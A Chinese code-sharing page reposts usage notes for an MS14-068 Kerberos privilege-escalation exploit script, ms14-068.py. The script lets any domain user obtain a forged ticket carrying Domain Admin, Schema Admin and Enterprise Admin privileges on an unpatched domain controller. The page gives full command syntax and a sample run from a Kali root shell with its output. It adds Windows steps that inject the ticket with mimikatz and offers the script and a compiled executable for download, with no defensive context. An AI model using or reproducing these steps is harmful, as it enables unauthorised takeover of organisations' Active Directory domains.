首页 > 代码库 > MS14-068 任何域内用户提升为域管理员PoC -中国寒龙
MS14-068 任何域内用户提升为域管理员PoC -中国寒龙
ms14-068.py
Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)
USAGE:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 | ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> OPTIONS: -p <clearPassword> --rc4 <ntlmHash> Example usage : Linux (tested with samba and MIT Kerberos) root@kali:~/sploit/pykek# python ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc Password: [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! [+] Creating ccache file ‘‘TGT_user-a-1@dom-a.loc.ccache‘‘... Done! root@kali:~/sploit/pykek# mv TGT_user-a-1@dom-a.loc.ccache /tmp/krb5cc_0 |
On Windows
1 2 | python.exe ms14-068.py -u user-a-1@dom-a.loc -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc mimikatz.exe "kerberos::ptc TGT_user-a-1@dom-a.loc.ccache" exit` |
提供的py脚本
MS14-068.py
附加转为exe后的程序
ms14-068.exe
MS14-068 任何域内用户提升为域管理员PoC -中国寒龙
声明:以上内容来自用户投稿及互联网公开渠道收集整理发布,本网站不拥有所有权,未作人工编辑处理,也不承担相关法律责任,若内容有误或涉及侵权可进行投诉: 投诉/举报 工作人员会在5个工作日内联系你,一经查实,本站将立刻删除涉嫌侵权内容。